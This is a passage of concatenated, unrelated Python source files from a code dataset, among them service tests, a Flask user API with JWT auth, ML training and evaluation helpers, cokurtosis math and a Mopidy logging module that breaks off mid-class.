        event_type='request_sleep', bot_id='id1',
        external_ip='8.8.4.4', authenticated_as='bot:id1.domain',
        dimensions={'id': ['id1'], 'foo': ['bar']}, state={'ram': 65},
        version=hashlib.sha256().hexdigest(), quarantined=True, task_id=None,
        task_name=None)
    # Assert that BotInfo was updated too.
    expected = {
      'authenticated_as': u'bot:id1.domain',
      'composite': [32, 4, 2],
      'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
      'external_ip': u'8.8.4.4',
      'first_seen_ts': now,
      'id': 'id1',
      'last_seen_ts': now,
      'lease_id': None,
      'lease_expiration_ts': None,
      'machine_type': None,
      'quarantined': True,
      'state': {u'ram': 65},
      'task_id': None,
      'task_name': None,
      'version': _VERSION,
    }
    bot_info = bot_management.get_info_key('id1').get()
    self.assertEqual(expected, bot_info.to_dict())
    # No BotEvent is registered for 'poll'.
    self.assertEqual([], bot_management.get_events_query('id1', True).fetch())
  def test_bot_event_busy(self):
    now = datetime.datetime(2010, 1, 2, 3, 4, 5, 6)
    self.mock_now(now)
    bot_management.bot_event(
        event_type='request_task', bot_id='id1',
        external_ip='8.8.4.4', authenticated_as='bot:id1.domain',
        dimensions={'id': ['id1'], 'foo': ['bar']}, state={'ram': 65},
        version=hashlib.sha256().hexdigest(), quarantined=False,
        task_id='12311', task_name='yo')
    expected = {
      'authenticated_as': u'bot:id1.domain',
      'composite': [32, 8, 1],
      'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
      'external_ip': u'8.8.4.4',
      'first_seen_ts': now,
      'id': 'id1',
      'last_seen_ts': now,
      'lease_id': None,
      'lease_expiration_ts': None,
      'machine_type': None,
      'quarantined': False,
      'state': {u'ram': 65},
      'task_id': u'12311',
      'task_name': u'yo',
      'version': _VERSION,
    }
    bot_info = bot_management.get_info_key('id1').get()
    self.assertEqual(expected, bot_info.to_dict())
    expected = [
      {
        'authenticated_as': u'bot:id1.domain',
        'dimensions': {u'foo': [u'bar'], u'id': [u'id1']},
        'event_type': u'request_task',
        'external_ip': u'8.8.4.4',
        'lease_id': None,
        'lease_expiration_ts': None,
        'machine_type': None,
        'message': None,
        'quarantined': False,
        'state': {u'ram': 65},
        'task_id': u'12311',
        'ts': now,
        'version': _VERSION,
      },
    ]
    self.assertEqual(
        expected,
        [e.to_dict() for e in bot_management.get_events_query('id1', True)])
  def test_should_restart_bot_not_set(self):
    state = {
      'running_time': 0,
      'started_ts': 1410989556.174,
    }
    self.assertEqual(
        (False, ''), bot_management.should_restart_bot('id', state))
  def test_should_restart_bot_bad_type(self):
    state = {
      'periodic_reboot_secs': '100',
      'running_time': 105,
      'started_ts': 1410989556.174,
    }
    self.assertEqual(
        (False, ''), bot_management.should_restart_bot('id', state))
  def test_should_restart_bot_no(self):
    state = {
      'periodic_reboot_secs': 100,
      'running_time': 0,
      'started_ts': 1410989556.174,
    }
    self.assertEqual(
        (False, ''), bot_management.should_restart_bot('id', state))
  def test_should_restart_bot(self):
    state = {
      'periodic_reboot_secs': 100,
      'running_time': 107,  # Affected by BOT_REBOOT_PERIOD_RANDOMIZATION_MARGIN
      'started_ts': 1410989556.174,
    }
    needs_reboot, message = bot_management.should_restart_bot('id', state)
    self.assertTrue(needs_reboot)
    self.assertTrue(message)
  def test_get_bot_reboot_period(self):
    # Mostly for code coverage.
    self.mock(bot_management, 'BOT_REBOOT_PERIOD_RANDOMIZATION_MARGIN', 0.1)
    state = {'periodic_reboot_secs': 1000, 'started_ts': 1234}
    self.assertEqual(980, bot_management.get_bot_reboot_period('bot', state))
    # Make sure the margin is respected.
    periods = set()
    for i in xrange(0, 1350):
      state = {'periodic_reboot_secs': 1000, 'started_ts': i}
      period = bot_management.get_bot_reboot_period('bot', state)
      self.assertTrue(900 <= period < 1100)
      periods.add(period)
    # Make sure it's really random and covers all expected range. (This check
    # relies on number of iterations above to be high enough).
    self.assertEqual(200, len(periods))
  def test_get_info_key(self):
    self.assertEqual(
        ndb.Key(bot_management.BotRoot, 'foo', bot_management.BotInfo, 'info'),
        bot_management.get_info_key('foo'))
  def test_get_root_key(self):
    self.assertEqual(
        ndb.Key(bot_management.BotRoot, 'foo'),
        bot_management.get_root_key('foo'))
  def test_get_settings_key(self):
    expected = ndb.Key(
        bot_management.BotRoot, 'foo', bot_management.BotSettings, 'settings')
    self.assertEqual(expected, bot_management.get_settings_key('foo'))
  def test_filter_dimensions(self):
    pass  # Tested in handlers_endpoints_test
  def test_filter_availability(self):
    pass  # Tested in handlers_endpoints_test
if __name__ == '__main__':
  # -v on the command line enables debug-level logging for the test run.
  logging.basicConfig(
      level=logging.DEBUG if '-v' in sys.argv else logging.ERROR)
  unittest.main()
| StarcoderdataPython |
5113341 | <reponame>vlievin/ovis
import os
import torch
class Session():
    """Small checkpoint helper: bundles model/estimator/optimizer state so a
    training run can be saved to, and restored from, a single tar file."""
    # Defaults used until a checkpoint overwrites them on the instance.
    best_elbo = (-1e20, 0, 0)
    global_step = 0
    epoch = 0
    filename = "session.tar"
    def __init__(self, run_id, logdir, model, estimator, optimizers):
        self.run_id = run_id
        self.logdir = logdir
        self.model = model
        self.estimator = estimator
        self.optimizers = optimizers
    def state_dict(self):
        """Snapshot everything needed to resume this run."""
        state = {
            'best_elbo': self.best_elbo,
            'global_step': self.global_step,
            'epoch': self.epoch,
            'run_id': self.run_id,
            'model': self.model.state_dict(),
            'estimator': self.estimator.state_dict(),
        }
        for idx, optimizer in enumerate(self.optimizers):
            state[self.opt_id(idx)] = optimizer.state_dict()
        return state
    @staticmethod
    def opt_id(k):
        """Checkpoint key for the k-th optimizer (1-based in the key name)."""
        return f"optimizer_{k + 1}"
    @property
    def path(self):
        """Full path of the checkpoint file inside the log directory."""
        return os.path.join(self.logdir, self.filename)
    def save(self):
        """Write the current session state to `self.path`."""
        torch.save(self.state_dict(), self.path)
    def load(self):
        """Restore session state from `self.path` onto the model's device."""
        target_device = next(iter(self.model.parameters())).device
        checkpoint = torch.load(self.path, map_location=target_device)
        assert self.run_id == checkpoint['run_id']
        self.best_elbo = checkpoint['best_elbo']
        self.global_step = checkpoint['global_step']
        self.epoch = checkpoint['epoch']
        self.model.load_state_dict(checkpoint['model'])
        self.estimator.load_state_dict(checkpoint['estimator'])
        for idx, optimizer in enumerate(self.optimizers):
            optimizer.load_state_dict(checkpoint[self.opt_id(idx)])
    def restore_if_available(self):
        """Load the checkpoint only if one already exists on disk."""
        if not os.path.exists(self.path):
            return
        self.load()
| StarcoderdataPython |
6614256 | <gh_stars>0
# Licensed under Apache License Version 2.0 - see LICENSE
import pytest
from iteration_utilities import all_distinct
import helper_funcs as _hf
from helper_cls import T
def test_alldistinct_empty1():
    """An empty iterable is trivially all-distinct."""
    assert all_distinct([])
def test_alldistinct_normal1():
    """Distinct hashable items."""
    assert all_distinct([T(1), T(2), T(3)])
def test_alldistinct_normal2():
    """Repeated hashable items."""
    assert not all_distinct([T(1), T(1), T(1)])
def test_alldistinct_normal3():
    # generator
    assert all_distinct((i for i in [T(1), T(2), T(3)]))
def test_alldistinct_unhashable1():
    """Unhashable items fall back to the equality-based slow path."""
    assert all_distinct([{T('a'): T(1)}, {T('a'): T(2)}])
def test_alldistinct_unhashable2():
    """Repeated unhashable items."""
    assert not all_distinct([{T('a'): T(1)}, {T('a'): T(1)}])
def test_alldistinct_failure1():
    """The exception of a failing iterable is propagated."""
    with pytest.raises(_hf.FailIter.EXC_TYP, match= _hf.FailIter.EXC_MSG):
        all_distinct(_hf.FailIter())
def test_alldistinct_failure2():
    # Test that a failing iterator doesn't raise a SystemError
    with pytest.raises(_hf.FailNext.EXC_TYP, match=_hf.FailNext.EXC_MSG):
        all_distinct(_hf.FailNext())
def test_alldistinct_failure3():
    # Failure when comparing the object to the objects in the list
    with pytest.raises(_hf.FailEqNoHash.EXC_TYP, match=_hf.FailEqNoHash.EXC_MSG):
        all_distinct([[T(1)], _hf.FailEqNoHash()])
def test_alldistinct_failure4():
    # Failure (no TypeError) when trying to hash the value
    with pytest.raises(_hf.FailHash.EXC_TYP, match=_hf.FailHash.EXC_MSG):
        all_distinct([T(1), _hf.FailHash()])
@_hf.skip_on_pypy_because_cache_next_works_differently
def test_alldistinct_failure5():
    # Changing next method
    with pytest.raises(_hf.CacheNext.EXC_TYP, match=_hf.CacheNext.EXC_MSG):
        all_distinct(_hf.CacheNext(1))
| StarcoderdataPython |
1662194 | <gh_stars>1-10
from flask import Blueprint, flash, g, request, jsonify
from flaskr.db import get_db
from werkzeug.security import check_password_hash, generate_password_hash
from sqlite3 import Error as SQLiteError
from jwt import DecodeError, encode as jwt_encode, decode as jwt_decode, ExpiredSignatureError
from functools import wraps
valid_body_keys = ("username", "password", "<PASSWORD>")
def user_by_username(username):
    """Return the (id, username, password) row for *username*, or None if absent."""
    row = get_db().execute(
        'SELECT id, username, password FROM user WHERE username = ?', (username,)
    ).fetchone()
    return row
def token_required(app):
    """Decorator factory: require a valid JWT in the Authentication header.

    The wrapped view receives the authenticated user row as its first argument.
    """
    def _decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            token = request.headers.get('Authentication')
            if not token:
                return jsonify({'message': 'token is missing on request', 'data': []}), 401
            try:
                payload = jwt_decode(token, app.config['SECRET_KEY'], algorithms="HS256")
                current_user = user_by_username(username=payload['username'])
            except DecodeError:
                return jsonify({'message': 'token is invalid or expired', 'data': []}), 401
            except ExpiredSignatureError:
                return jsonify({'message': 'token is expired', 'data': []}), 401
            return f(current_user, *args, **kwargs)
        return wrapper
    return _decorator
def construct_blueprint(app):
    """Build the /user blueprint (CRUD endpoints for user accounts)."""
    bp = Blueprint('user', __name__, url_prefix='/user')
    query_user_by_id = 'SELECT id, username, password FROM user WHERE id = ?'
    message_user_not_found = 'user not found'
    message_unexpected_error = 'that occurred an error during user registration'
    # NOTE(review): unlike delete_user/get_user/list_users, update_user is not
    # protected by @token_required — confirm whether that is intentional.
    @bp.route('/<int:id>', methods=['PUT'])
    def update_user(id):
        """Update a user's username/password; rejects duplicate usernames."""
        db = get_db()
        request_body = request.get_json()
        if request.is_json and all (k in valid_body_keys[:-1] for k in request_body):
            username, password = request_body['username'], request_body['password']
            user = db.execute(
                query_user_by_id, (id,)
            ).fetchone()
            if user is None:
                return jsonify({'message': message_user_not_found}), 404
            if user_by_username(username) is not None:
                return jsonify({'message': 'provided username already registered'}), 409
            try:
                db.execute(
                    'UPDATE user SET username = ?, password = ? WHERE id = ?',
                    (username, generate_password_hash(password), id)
                )
                db.commit()
                return jsonify({'message': f'user {username} was successfully updated', 'data': {'id': user['id'], 'username': username}}), 200
            except SQLiteError:
                return jsonify({'message': message_unexpected_error}), 500
        return jsonify({'message': 'invalid request provided'}), 403
    @bp.route('/<int:id>', methods=['DELETE'])
    @token_required(app)
    # Bug fix: token_required invokes the view as f(current_user, **kwargs),
    # so the view must accept current_user first (as get_user/list_users do);
    # with the old signature `delete_user(id)` every call raised
    # "got multiple values for argument 'id'".
    def delete_user(current_user, id):
        """Delete a user and all of their panels/panel cards."""
        db = get_db()
        user = db.execute(
            query_user_by_id, (id,)
        ).fetchone()
        if user is None:
            return jsonify({'message': message_user_not_found}), 404
        try:
            # Remove dependent rows first to keep referential integrity.
            db.execute('DELETE FROM panel_card WHERE panel_id = (SELECT id FROM panel where user_id = ?)', (id,))
            db.commit()
            db.execute('DELETE FROM panel WHERE user_id = ?', (id,))
            db.commit()
            db.execute('DELETE FROM user WHERE id = ?', (id,))
            db.commit()
            return jsonify({'message': f'user was successfully deleted'}), 200
        except SQLiteError:
            return jsonify({'message': message_unexpected_error}), 500
    @bp.route('/', methods=['POST'])
    def register_user():
        """Create a new user; requires username, password and confirm_password."""
        request_body = request.get_json()
        if request.is_json and all (k in valid_body_keys for k in request_body):
            username, password, confirm_password = request_body['username'], request_body['password'], request_body['confirm_password']
            db = get_db()
            user = user_by_username(username)
            if user is not None:
                return jsonify({'message': 'provided username already exists'}), 409
            if password != confirm_password:
                return jsonify({'message': 'provided passwords doesn\'t match'}), 401
            try:
                db.execute(
                    'INSERT INTO user (username, password) VALUES (?, ?)',
                    (username, generate_password_hash(password))
                )
                db.commit()
                newuser = user_by_username(username)
                return jsonify({'message': f'user {username} was successfully registered', 'data': {'id': newuser['id'], 'username': newuser['username']}}), 200
            except SQLiteError:
                return jsonify({'message': message_unexpected_error}), 500
        return jsonify({'message': 'invalid request provided'}), 403
    @bp.route('/<int:id>', methods=['GET'])
    @token_required(app)
    def get_user(current_user,id):
        """Return a single user (requires a valid token)."""
        db = get_db()
        user = db.execute(query_user_by_id, (id,)).fetchone()
        if user is None:
            return jsonify({'message': message_user_not_found}), 404
        return jsonify({'data': {'id': user['id'],'username': user['username']}})
    @bp.route('/list', methods=['GET'])
    @token_required(app)
    def list_users(current_user):
        """Return all users (requires a valid token)."""
        db = get_db()
        users = db.execute('SELECT id, username, password FROM user')
        return jsonify({'data': [{
            'id': user['id'],
            'username': user['username']
        } for user in users]})
    return bp
1697225 | <gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import sys
import argparse
from _test_commons import run_subprocess
import logging
logging.basicConfig(format="%(asctime)s %(name)s [%(levelname)s] - %(message)s", level=logging.DEBUG)
log = logging.getLogger("ORTModuleDistributedTests")
def parse_arguments():
    """Parse command-line options for the distributed ORTModule test driver."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument("--cwd", help="Path to the current working directory")
    arg_parser.add_argument("--mnist", help="Path to the mnist data directory", type=str, default=None)
    return arg_parser.parse_args()
def run_ortmodule_deepspeed_zero_stage_1_tests(cwd, log, data_dir):
    """Run the ORTModule + DeepSpeed ZeRO stage 1 test via the deepspeed launcher."""
    log.debug("Running: ORTModule deepspeed zero stage 1 tests")
    command = [
        "deepspeed",
        "orttraining_test_ortmodule_deepspeed_zero_stage_1.py",
        "--deepspeed_config",
        "orttraining_test_ortmodule_deepspeed_zero_stage_1_config.json",
    ]
    if data_dir:
        command.extend(["--data-dir", data_dir])
    run_subprocess(command, cwd=cwd, log=log).check_returncode()
def run_pytorch_ddp_tests(cwd, log):
    """Run the ORTModule PyTorch DDP test with the current interpreter."""
    log.debug("Running: ORTModule Pytorch DDP tests")
    command = [sys.executable, "orttraining_test_ortmodule_pytorch_ddp.py", "--use_ort_module"]
    run_subprocess(command, cwd=cwd, log=log).check_returncode()
def run_ortmodule_deepspeed_pipeline_parallel_tests(cwd, log):
    """Run the ORTModule + DeepSpeed pipeline-parallel test via the deepspeed launcher."""
    log.debug("Running: ORTModule deepspeed pipeline parallel tests")
    command = [
        "deepspeed",
        "orttraining_test_ortmodule_deepspeed_pipeline_parallel.py",
        "--deepspeed_config",
        "orttraining_test_ortmodule_deepspeed_pipeline_parallel_config.json",
    ]
    run_subprocess(command, cwd=cwd, log=log).check_returncode()
def run_ortmodule_fairscale_sharded_optimizer_tests(cwd, log, data_dir):
    """Run the ORTModule + fairscale sharded-optimizer test script."""
    log.debug("Running: ORTModule fairscale sharded optimizer tests")
    # Consistency fix: use the current interpreter (as run_pytorch_ddp_tests
    # does) instead of a hard-coded "python3", so the test runs in the same
    # Python environment as this driver.
    command = [
        sys.executable,
        "orttraining_test_ortmodule_fairscale_sharded_optimizer.py",
        "--use_sharded_optimizer",
        "--use_ortmodule",
    ]
    if data_dir:
        command.extend(["--data-dir", data_dir])
    run_subprocess(command, cwd=cwd, log=log).check_returncode()
def main():
    """Entry point: run every distributed ORTModule test suite in order."""
    args = parse_arguments()
    log.info("Running ortmodule tests pipeline")
    run_pytorch_ddp_tests(args.cwd, log)
    run_ortmodule_deepspeed_zero_stage_1_tests(args.cwd, log, args.mnist)
    run_ortmodule_deepspeed_pipeline_parallel_tests(args.cwd, log)
    run_ortmodule_fairscale_sharded_optimizer_tests(args.cwd, log, args.mnist)
    return 0
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit code.
    sys.exit(main())
| StarcoderdataPython |
9695416 | from django.shortcuts import render
from django.views.generic import ListView, DetailView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from .models import BlogPost
class BlogListView(ListView):
    """Paginated list of blog posts (5 per page), exposed to the template as 'blogs'."""
    model = BlogPost
    template_name = 'blogs.html'
    context_object_name = 'blogs'
    paginate_by = 5
    def get_context_data(self, **kwargs):
        """Replace the 'blogs' context entry with a safely-paginated page.

        Invalid ?page= values fall back to page 1; out-of-range values fall
        back to the last page.
        """
        # Bug fix: the original called super().get_context_data(*kwargs),
        # which unpacks the kwargs dict's *keys* as positional arguments
        # (a TypeError whenever kwargs is non-empty); keyword arguments
        # must be forwarded with **kwargs.
        context = super(BlogListView, self).get_context_data(**kwargs)
        blogs = self.get_queryset()
        page = self.request.GET.get('page')
        paginator = Paginator(blogs, self.paginate_by)
        try:
            blogs = paginator.page(page)
        except PageNotAnInteger:
            blogs = paginator.page(1)
        except EmptyPage:
            blogs = paginator.page(paginator.num_pages)
        context['blogs'] = blogs
        return context
class BlogDetailView(DetailView):
    """Single blog post page; the post is exposed to the template as 'blog'."""
    model = BlogPost
    template_name = "blogpost.html"
    context_object_name = 'blog'
1712943 | <filename>scripts/test.py
# MSRA Internal Graphics
#
"""
Examples:
"""
import os
import h5py
import numpy as np
import tensorflow as tf
import models
from scripts import dataset
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def eval_phase_network(net, reader):
    """Build the inference graph; returns (predicted labels, softmax scores)."""
    data, _ = net.cook_raw_inputs(reader)
    # Instantiate the network in eval mode (training=False, reuse=False).
    logits = net(False, False).instance(data)
    probs = tf.nn.softmax(logits, name='softmax')
    _, labels = tf.nn.top_k(probs, name='seg_label')
    return labels, probs
def eval_network(args):
    """Restore a trained model and run inference over the test tfrecords,
    writing the stacked predictions (or logits) to an HDF5 file."""
    # network choice
    net = models.NETWORK[args.input_network]
    # data reader
    data_dir = args.input_training_data_path
    data_records = [item for item in os.listdir(data_dir) if item.endswith('.tfrecord')]
    test_records = [os.path.join(data_dir, item) for item in data_records if item.find('test') != -1]
    num_samples = sum(1 for _ in tf.python_io.tf_record_iterator(test_records[0]))
    reader = dataset.SceneReader(test_records)
    outputs = eval_phase_network(net, reader)
    config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)
    with tf.Session(config=config) as sess:
        init = tf.global_variables_initializer()
        sess.run(init)
        saver = tf.train.Saver()
        # A directory means "pick the latest checkpoint"; otherwise the path
        # is treated as a specific checkpoint file.
        if os.path.isdir(args.output_model_path):
            model_choice = tf.train.latest_checkpoint(args.output_model_path)
        else:
            model_choice = args.output_model_path
        saver.restore(sess, model_choice)
        print('start evaluate model: %s' % model_choice)
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(coord=coord)
        predict_tensor = []
        for sample in range(num_samples):
            [predict, logit] = [np.squeeze(item) for item in sess.run(outputs)]
            # print('run iteration: %03d' % sample)
            # 'fusion' keeps hard labels; other platforms keep raw softmax logits.
            if args.eval_platform == 'fusion':
                predict_tensor.append(np.array(predict))
            else:
                predict_tensor.append(np.array(logit))
        # finished training
        coord.request_stop()
        coord.join(threads)
    predict_tensor = np.stack(predict_tensor, axis=0)
    print(predict_tensor.shape)
    # Move the channel axis for logit outputs (NHWC-style layout).
    if not args.eval_platform == 'fusion':
        predict_tensor = np.swapaxes(predict_tensor, -1, 1)
        predict_tensor = np.swapaxes(predict_tensor, -1, 2)
        predict_tensor = np.swapaxes(predict_tensor, -1, 3)
    if not os.path.exists(args.eval_results):
        os.mkdir(args.eval_results)
    file_name = '.'.join((os.path.split(model_choice)[1].split('.')[0], 'hdf5'))
    fp = h5py.File(os.path.join(args.eval_results, file_name), 'w')
    result = fp.create_dataset('result', predict_tensor.shape, dtype='f')
    result[...] = predict_tensor
    fp.close()
    return
| StarcoderdataPython |
8161825 | <filename>Workspace.py
import os
import pickle
CodeDir="/home/mrware/Dropbox/Code/NYTimes API"
WorkspaceObjects=[]
def save_obj(obj, name ):
    """Pickle *obj* to CodeDir/obj/<name>.pkl, creating the folder if needed."""
    folder = CodeDir + '/obj/'
    if not os.path.isdir(folder):
        os.makedirs(folder)
    target = folder + name + '.pkl'
    with open(target, 'wb') as f:
        pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name ):
    """Unpickle CodeDir/obj/<name>.pkl; on a missing file, create the folder,
    persist an empty dict under that name, and return {}. (Python 2 module.)"""
    folder=CodeDir+'/obj/'
    try:
        with open(folder + name + '.pkl', 'rb') as f:
            print name+" remembered!"
            return pickle.load(f)
    except IOError:
        if not os.path.isdir(folder):
            os.makedirs(folder)
        save_obj({},name)
        return {}
def det_fn_name(fn ):
    """Extract a function's name from its repr, e.g. '<function foo at 0x..>' -> 'foo'.

    Note: relies on the first ' ' and the first 'at' in the repr, so names
    containing 'at' would truncate early (preserved original behaviour).
    """
    text = str(fn)
    start = text.index(' ')
    stop = text.index('at')
    return text[start:stop].strip()
def save_workspace():
    """Call make_memory() on every registered workspace object. (Python 2.)"""
    for obj in WorkspaceObjects:
        print "Saving %s ..." % obj
        globals()[obj].make_memory()
    print "Done!"
def clear_workspace():
    """Call forget() on every registered workspace object."""
    for obj in WorkspaceObjects:
        print "Clearing %s ..." % obj
        globals()[obj].forget()
    print "Done!"
def clean_slate():
    # NOTE(review): identical to clear_workspace() — possibly meant to also
    # delete the pickled obj/ folder; confirm intended behaviour.
    for obj in WorkspaceObjects:
        print "Clearing %s ..." % obj
        globals()[obj].forget()
    print "Done!"
| StarcoderdataPython |
8043247 |
from numba import jit,vectorize,njit
import numpy as np
import functools as fc
import os
import time
from tqdm.notebook import tqdm_notebook as tqdm
# from tqdm import tqdm
# tqdm = lambda x : x
# def co_variance(X,bias=0):
# nx,i = X.shape ## X is input data matrix
# # ans = np.zeros((i,i))#,dtype=float)
# # for a in X:
# # ans += np.outer(a,a)
# ans = X.T.dot(X)
# return ans/(nx-bias)
def co_variance(x,bias=0):
    """Covariance-style matrix X^T X / (n - bias) for a row-sample matrix x."""
    n_samples = x.shape[0]
    return np.dot(x.T, x) / (n_samples - bias)
co_variance.name = "co_variance" ## Abuse of function notations
def ex_variance(cm):
    """Outer product of the covariance matrix with itself, reshaped to (i, i**3)."""
    dim = cm.shape[0]
    flat = np.outer(cm, cm)
    return flat.reshape(dim, dim ** 3)
def ra_kurtosis(X,bias=0):
    """Raw (non-central) fourth-moment matrix of a row-sample matrix X.

    Returns shape (i, i**3): entry [l, flat(i,j,k)] = sum_n x_i x_j x_k x_l
    divided by (nx - bias) — identical to accumulating
    outer(outer(outer(a,a),a),a) per sample and transposing.
    """
    nx, i = X.shape
    # Performance: one einsum contraction replaces the Python loop over
    # samples (and drops the notebook-only tqdm progress bar from this
    # numeric kernel). The output is the same d**4-element tensor.
    moment = np.einsum('nl,ni,nj,nk->lijk', X, X, X, X)
    return moment.reshape(i, i ** 3) / (nx - bias)
ra_kurtosis.name="Raw_kurtosis"
def co_kurtosis(rand_mat,bias=0):
    """Excess cokurtosis: raw fourth moment minus 3x the Gaussian expectation."""
    raw = ra_kurtosis(rand_mat, bias)
    cov = co_variance(rand_mat, 1)  # unbiased covariance estimate
    return raw - 3 * ex_variance(cov)
co_kurtosis.name = "co_kurtosis"
@jit
def val_substraction(CK,CV):
    """Subtract, in place, the three Gaussian pairings of the covariance from
    the raw fourth-moment tensor CK (index form of the excess cokurtosis).
    Numba-jitted; O(nvar**4) explicit loops."""
    nvar = CV.shape[-1]
    for i in range(nvar):
        for j in range(nvar):
            for k in range(nvar):
                for l in range(nvar):
                    CK[i,j,k,l] = (CK[i,j,k,l] - CV[i,j]*CV[k,l] - CV[i,k]*CV[j,l] - CV[i,l]*CV[j,k])
    return CK
# def outer_Variance()
def val_kurtosis(xscaled):
    """Cokurtosis via the explicit index subtraction (validation path)."""
    n, nvar = xscaled.shape
    fourth = ra_kurtosis(xscaled).reshape(nvar, nvar, nvar, nvar)
    cov = co_variance(xscaled)
    fourth = val_substraction(fourth, cov)
    return fourth.reshape(nvar, nvar * nvar * nvar)
val_kurtosis.name="val_kurtosis"
## -------------------------------------------------------------------------
### Following function isued for testing accuracy with index definitio of kurtosis
### Warning-~very slow execution without numba jit
@jit
def ex_kurtosis(u):
    """Reference implementation of the cokurtosis using the index definition.
    Kept for accuracy testing; O(nx * nv**4) — very slow without numba jit."""
    nx,nv = u.shape
    mom = np.zeros((nv, nv))#, dtype=float, order='F')
    # compute covariance matrix
    for j in range(nv):
        for i in range(nv):
            for n in range(nx):
                mom[i,j] = mom[i,j] + u[n,i] * u[n,j]
    mom2 = mom/nx
    tmp = np.zeros((nv,nv,nv,nv))#, dtype=float, order='F')
    # compute cokurtosis matrix
    for l in range(nv):
        for k in range(nv):
            for j in range(nv):
                for i in range(nv):
                    for n in range(nx):
                        tmp[i,j,k,l] = tmp[i,j,k,l] + u[n,i] * u[n,j] * u[n,k] * u[n,l]
    tmp=tmp/nx
    # subtract the three Gaussian covariance pairings (excess kurtosis)
    for l in range(nv):
        for k in range(nv):
            for j in range(nv):
                for i in range(nv):
                    tmp[i,j,k,l] = tmp[i,j,k,l] - mom2[i,j]*mom2[k,l] - mom2[i,k]*mom2[j,l] - mom2[i,l]*mom2[j,k]
    return tmp.reshape(nv,nv**3)
ex_kurtosis.name="For loop kurtosis"
| StarcoderdataPython |
1610509 | from __future__ import absolute_import, unicode_literals
import logging
import logging.config
import logging.handlers
import platform
# Verbosity level (-1..4) -> log level for the root logger and for mopidy.*
# loggers; consumed by VerbosityFilter below.
LOG_LEVELS = {
    -1: dict(root=logging.ERROR, mopidy=logging.WARNING),
    0: dict(root=logging.ERROR, mopidy=logging.INFO),
    1: dict(root=logging.WARNING, mopidy=logging.DEBUG),
    2: dict(root=logging.INFO, mopidy=logging.DEBUG),
    3: dict(root=logging.DEBUG, mopidy=logging.DEBUG),
    4: dict(root=logging.NOTSET, mopidy=logging.NOTSET),
}
# Custom log level which has even lower priority than DEBUG
TRACE_LOG_LEVEL = 5
logging.addLevelName(TRACE_LOG_LEVEL, 'TRACE')
class DelayedHandler(logging.Handler):
    """Buffers log records until release(), then replays them on the root logger."""
    def __init__(self):
        logging.Handler.__init__(self)
        self._released = False
        self._buffer = []
    def handle(self, record):
        # Before release: queue the record instead of emitting it.
        if self._released:
            return
        self._buffer.append(record)
    def release(self):
        """Flush buffered records to the root logger, in arrival order."""
        self._released = True
        root_logger = logging.getLogger('')
        while self._buffer:
            root_logger.handle(self._buffer.pop(0))
# Module-wide buffering handler; released by setup_logging().
_delayed_handler = DelayedHandler()
def bootstrap_delayed_logging():
    """Install the buffering handler so early records survive until setup_logging()."""
    root = logging.getLogger('')
    root.setLevel(logging.NOTSET)
    root.addHandler(_delayed_handler)
def setup_logging(config, verbosity_level, save_debug_log):
    """Configure all logging handlers, then flush records buffered at bootstrap."""
    logging.captureWarnings(True)
    config_file = config['logging']['config_file']
    if config_file:
        # Logging config from file must be read before other handlers are
        # added. If not, the other handlers will have no effect.
        logging.config.fileConfig(config_file, disable_existing_loggers=False)
    setup_console_logging(config, verbosity_level)
    if save_debug_log:
        setup_debug_logging_to_file(config)
    _delayed_handler.release()
def setup_console_logging(config, verbosity_level):
    """Attach a console handler honouring verbosity and per-logger overrides."""
    # Clamp the verbosity to the supported LOG_LEVELS range.
    lowest, highest = min(LOG_LEVELS.keys()), max(LOG_LEVELS.keys())
    verbosity_level = max(lowest, min(highest, verbosity_level))
    loglevels = config.get('loglevels', {})
    has_debug_loglevels = any(
        level < logging.INFO for level in loglevels.values())
    verbosity_filter = VerbosityFilter(verbosity_level, loglevels)
    # The terse console format is only used when nothing needs debug detail.
    use_console_format = verbosity_level < 1 and not has_debug_loglevels
    log_format = config['logging'][
        'console_format' if use_console_format else 'debug_format']
    if config['logging']['color']:
        handler = ColorizingStreamHandler(config.get('logcolors', {}))
    else:
        handler = logging.StreamHandler()
    handler.addFilter(verbosity_filter)
    handler.setFormatter(logging.Formatter(log_format))
    logging.getLogger('').addHandler(handler)
def setup_debug_logging_to_file(config):
    """Attach a rotating debug file handler (10 MiB x 3 backups) to the root logger."""
    file_handler = logging.handlers.RotatingFileHandler(
        config['logging']['debug_file'], maxBytes=10485760, backupCount=3)
    file_handler.setFormatter(logging.Formatter(config['logging']['debug_format']))
    logging.getLogger('').addHandler(file_handler)
class VerbosityFilter(logging.Filter):
    """Filter records using per-logger overrides, else verbosity defaults."""
    def __init__(self, verbosity_level, loglevels):
        self.verbosity_level = verbosity_level
        self.loglevels = loglevels
    def filter(self, record):
        # Explicit per-logger overrides win; they match the named logger
        # itself and any of its children.
        for name, required_log_level in self.loglevels.items():
            if record.name == name or record.name.startswith(name + '.'):
                return record.levelno >= required_log_level
        # Fall back to the mopidy/root defaults for the current verbosity.
        scope = 'mopidy' if record.name.startswith('mopidy') else 'root'
        return record.levelno >= LOG_LEVELS[self.verbosity_level][scope]
#: Available log colors.
COLORS = [b'black', b'red', b'green', b'yellow', b'blue', b'magenta', b'cyan',
          b'white']
class ColorizingStreamHandler(logging.StreamHandler):
    """
    Stream handler which colorizes the log using ANSI escape sequences.
    Does nothing on Windows, which doesn't support ANSI escape sequences.
    This implementation is based upon https://gist.github.com/vsajip/758430,
    which is:
        Copyright (C) 2010-2012 <NAME>. All rights reserved.
        Licensed under the new BSD license.
    """
    # Map logging levels to (background, foreground, bold/intense)
    # NOTE(review): with `unicode_literals` in effect these color names are
    # unicode while COLORS holds byte strings; on Python 2 the membership
    # test in colorize() coerces them, but on Python 3 they would never
    # match — confirm before porting.
    level_map = {
        TRACE_LOG_LEVEL: (None, 'blue', False),
        logging.DEBUG: (None, 'blue', False),
        logging.INFO: (None, 'white', False),
        logging.WARNING: (None, 'yellow', False),
        logging.ERROR: (None, 'red', False),
